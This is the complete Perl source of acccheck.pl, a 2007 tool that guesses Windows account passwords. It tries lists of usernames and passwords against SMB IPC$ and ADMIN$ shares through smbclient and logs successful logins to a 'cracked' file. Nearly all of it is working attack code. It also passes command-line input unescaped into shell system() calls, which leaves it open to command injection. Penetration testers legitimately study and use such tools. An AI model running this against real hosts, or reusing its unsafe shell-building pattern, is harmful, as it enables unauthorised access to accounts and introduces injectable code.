#!/usr/bin/perl -w# acccheck.pl v0.2.1 - Windows password guessing tool for

1. #!/usr/bin/perl -w
2.  
3. # acccheck.pl v0.2.1 - Windows password guessing tool for Linux
4. # Copyright (C) 2007 Faisal Dean (Faiz)
5. #
6. # This tool may be used for legal purposes only. Users take full responsibility
7. # for any actions performed using this tool. The author accepts no liability
8. # for damage caused by this tool. If these terms are not acceptable to you, then
9. # do not use this tool.
10. #
11. # In all other respects the GPL version 2 applies:
12. #
13. # This program is free software; you can redistribute it and/or modify
14. # it under the terms of the GNU General Public License as published by
15. # the Free Software Foundation; either version 2 of the License, or
16. # (at your option) any later version.
17. #
18. # This program is distributed in the hope that it will be useful,
19. # but WITHOUT ANY WARRANTY; without even the implied warranty of
20. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
21. # GNU General Public License for more details.
22. #
23. # You should have received a copy of the GNU General Public License along
24. # with this program; if not, write to the Free Software Foundation, Inc.,
25. # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
26. #
27. # You are encouraged to send comments, improvements or suggestions to
28. # me at fmd@portcullis-security.com
29.  
30. ###############################################################################
31. #Filename: acccheck.pl #
32. #Written by: Faisal Dean (Faiz) #
33. #Version: 0.2.1 #
34. ###############################################################################
35.  
36. ###############################################################################
37. #Software Requirements: #
38. # Perl #
39. # Samba (smbclient) #
40. ###############################################################################
41.  
42. ###############################################################################
43. #Description: #
44. # #
45. # Attempts to connect to the NetBIOS service using smbclient on the target #
46. # system. It attempts to connect to the IPC$ and ADMIN$ shares depending on #
47. # which flags have been chosen, and tries a combination of usernames and #
48. # passwords in the hope to identfy the password to a given account via a #
49. # dictionary password guessing attack. #
50. # #
51. ###############################################################################
52.  
53. ###############################################################################
54. #Usage: #
55. # ./acccheck.pl [optional] #
56. # #
57. # -t <single target ip> #
58. # OR #
59. # -T <file containing target ips> #
60. # optional : #
61. # -p <single password> #
62. # -P <file containing passwords> #
63. # -u <single user> #
64. # -U <file containing usernames> #
65. # -v <verbose mode> #
66. #Examples: #
67. # acccheck.pl -t 10.10.10.1 #
68. # This will attempt a BLANK password against the #
69. # Administrator account. #
70. # acccheck.pl -t 10.10.10.1 -p password.txt #
71. # This will attempt all password in 'password.txt' against #
72. # the 'administrator' account. #
73. # acccehck.pl -t 10.10.10.1 -u users.txt -p password.txt #
74. # This will attempt all of the passwords in 'password.txt' #
75. # against the users in 'users.txt'. #
76. ###############################################################################
77.  
78. use Getopt::Std;
79. use IO::Socket;
80. use Tie::File;
81. use Term::ANSIColor;
82.  
83. use vars qw($INPUTFILE $PASSFILE $USERFILE @IP_LIST @PASS_LIST @USER_LIST);
84. use vars qw($inputFile $passFile $userFile $singleIp $singlePass $singleUser $connectValue $verbose);
85.  
86. $inputFile=0;
87. $passFile=0;
88. $userFile=0;
89. $verbose=0;
90.  
91. #main
92. {
93. $SIG{"INT"} = "cleanup";
94.  
95. #get options from command line
96. getopts("t:T:p:P:u:U:v");
97.  
98. if($opt_t)
99. {
100. system("echo $opt_t > t.txt");
101. $INPUTFILE = "t.txt";
102. $inputFile = 1;
103. }
104. if($opt_T)
105. {
106.  
107. $INPUTFILE = $opt_T;
108. $inputFile = 1;
109. }
110. if($opt_p)
111. {
112. system("echo $opt_p > p.txt");
113. $PASSFILE = "p.txt";
114. $passFile = 1;
115. }
116. if($opt_P)
117. {
118. $PASSFILE = $opt_P;
119. $passFile = 1;
120. }
121. if($opt_u)
122. {
123. system("echo $opt_u > u.txt");
124. $USERFILE = "u.txt";
125. $userFile = 1;
126. }
127. if($opt_U)
128. {
129. $USERFILE = $opt_U;
130. $userFile = 1;
131. }
132. if($opt_v)
133. {
134. $verbose = 1;
135. $opt_v = 1;
136. }
137.  
138. #read in the content of the various files into a list
139. if($inputFile == 1)
140. {
141. tie @IP_LIST, 'Tie::File', $INPUTFILE or die "cannot open $INPUTFILE file";
142. }
143. if($passFile == 1)
144. {
145. tie @PASS_LIST, 'Tie::File', $PASSFILE or die "cannot open $PASSFILE file";
146. }
147. if($userFile == 1)
148. {
149. tie @USER_LIST, 'Tie::File', $USERFILE or die "cannot open $USERFILE file";
150. }
151.  
152.  
153. #do some flag checking before you start
154. if($inputFile == 0)
155. {
156. usage(); #quit with some usage information
157. }
158. else
159. {
160. smbConnect(); #do the business
161. cleanup();
162. }
163.  
164. exit();
165.  
166. }
167.  
168. #show usage information and quit
169. sub usage {
170. print color("green"), "\nacccheck.pl v0.2.1 - By Faiz\n\n";
171. print "Description:\n";
172. print "Attempts to connect to the IPC\$ and ADMIN\$ shares depending on which flags have been\n";
173. print "chosen, and tries a combination of usernames and passwords in the hope to identify\n";
174. print "the password to a given account via a dictionary password guessing attack.\n", color("reset");
175. print "\nUsage = ./acccheck.pl [optional]\n\n";
176. print " -t [single host IP address]\n";
177. print " OR \n";
178. print " -T [file containing target ip address(es)]\n";
179.  
180. print "\nOptional:\n";
181. print " -p [single password]\n";
182. print " -P [file containing passwords]\n";
183. print " -u [single user]\n";
184. print " -U [file containing usernames]\n";
185. print " -v [verbose mode]\n\n";
186. print color("green"), "Examples\n";
187. print "Attempt the 'Administrator' account with a [BLANK] password.\n";
188. print " acccheck.pl -t 10.10.10.1\n";
189. print "Attempt all passwords in 'password.txt' against the 'Administrator' account.\n";
190. print " acccheck.pl -t 10.10.10.1 -P password.txt\n";
191. print "Attempt all password in 'password.txt' against all users in 'users.txt'.\n";
192. print " acccehck.pl -t 10.10.10.1 -U users.txt -P password.txt\n";
193. print "Attempt a single password against a single user.\n";
194. print " acccheck.pl -t 10.10.10.1 -u administrator -p password\n", color("reset");
195. exit();
196. }
197.  
198. sub output {
199. if($verbose == 1)
200. {
201. print"$_[0]\n";
202. }
203. }
204.  
205. sub cleanup {
206. system("rm -rf t.txt p.txt u.txt");
207. exit();
208. }
209.  
210.  
211. #this is the main routine, a bit repetitive, but hey, what the hell......it works :)
212. sub smbConnect {
213. foreach $singleIp (@IP_LIST)
214. {
215. chomp($singleIp);
216. if(($userFile == 1) and ($passFile == 1))
217. {
218. foreach $singleUser (@USER_LIST)
219. {
220. chomp($singleUser);
221. foreach $singlePass (@PASS_LIST)
222. {
223. chomp($singlePass);
224. if($singlePass)
225. {
226. output("Host:$singleIp, Username:'$singleUser', Password:'$singlePass'");
227. $connectValue = system("smbclient \\\\\\\\$singleIp\\\\IPC\$ -U '$singleUser'%'$singlePass' -c 'exit' 1> /dev/null 2> /dev/null");
228. if($connectValue == 0)
229. {
230. print"\n SUCCESS.... connected to $singleIp with username:'$singleUser' and password:'$singlePass'\n";
231. system("echo Success: Target $singleIp, Username:'$singleUser' Password:'$singlePass' >> cracked");
232. last;
233. }
234. }
235. elsif(!$singlePass)
236. {
237. output("Host:$singleIp, Username:'$singleUser', Password:'$singlePass'");
238. $connectValue = system("smbclient \\\\\\\\$singleIp\\\\admin\$ -U '$singleUser'%'$singlePass' -c 'exit' 1> /dev/null 2> /dev/null");
239. if($connectValue == 0)
240. {
241. print"\n SUCCESS.... connected to $singleIp with username:'$singleUser' and password:'$singlePass'\n";
242. system("echo Success: Target $singleIp, Username:'$singleUser' Password:'$singlePass' >> cracked");
243. last;
244. }
245.  
246. }
247. }
248. }
249. print"\nEnd of Scan\n\n";
250. }
251. elsif(($userFile == 0) and ($passFile == 1))
252. {
253. foreach $singlePass (@PASS_LIST)
254. {
255. chomp($singlePass);
256. output("Host:$singleIp, Username:Administrator, Password:'$singlePass'");
257. $connectValue = system("smbclient \\\\\\\\$singleIp\\\\admin\$ -U Administrator%'$singlePass' -c 'exit' 1> /dev/null 2> /dev/null");
258. if($connectValue == 0)
259. {
260. print"\n SUCCESS.... connected to $singleIp with username:'Administrator' and password:'$singlePass'\n";
261. system("echo Success: Target $singleIp, Username:'Administrator' Password:'$singlePass' >> cracked");
262. }
263. }
264. print"\nEnd of Scan\n\n";
265. }
266. elsif(($userFile == 1) and ($passFile == 0))
267. {
268. foreach $singleUser (@USER_LIST)
269. {
270. chomp($singleUser);
271. output("Host:$singleIp, Username:'$singleUser', Password:BLANK");
272. $connectValue = system("smbclient \\\\\\\\$singleIp\\\\admin\$ -U '$singleUser'% -c 'exit' 1> /dev/null 2> /dev/null");
273. if($connectValue == 0)
274. {
275. print"\n SUCCESS.... connected to $singleIp with username:'$singleUser' and password:' '\n";
276. system("echo Success: Target $singleIp, Username:'$singleUser' Password:' ' >> cracked");
277. }
278. }
279. print"\nEnd of Scan\n\n";
280. }
281. elsif(($userFile == 0) and ($passFile == 0))
282. {
283. output("Host:$singleIp, Username:Administrator, Password:BLANK");
284. $connectValue = system("smbclient \\\\\\\\$singleIp\\\\admin\$ -U Administrator% -c 'exit' 1> /dev/null 2> /dev/null");
285. if($connectValue == 0)
286. {
287. print"\n SUCCESS.... connected to $singleIp with username:'Administrator' and password:' '\n";
288. system("echo Success: Target $singleIp, Username:'Administrator' Password:' ' >> cracked");
289. }
290. print"\nEnd of Scan\n\n";
291. }
292. }
293. }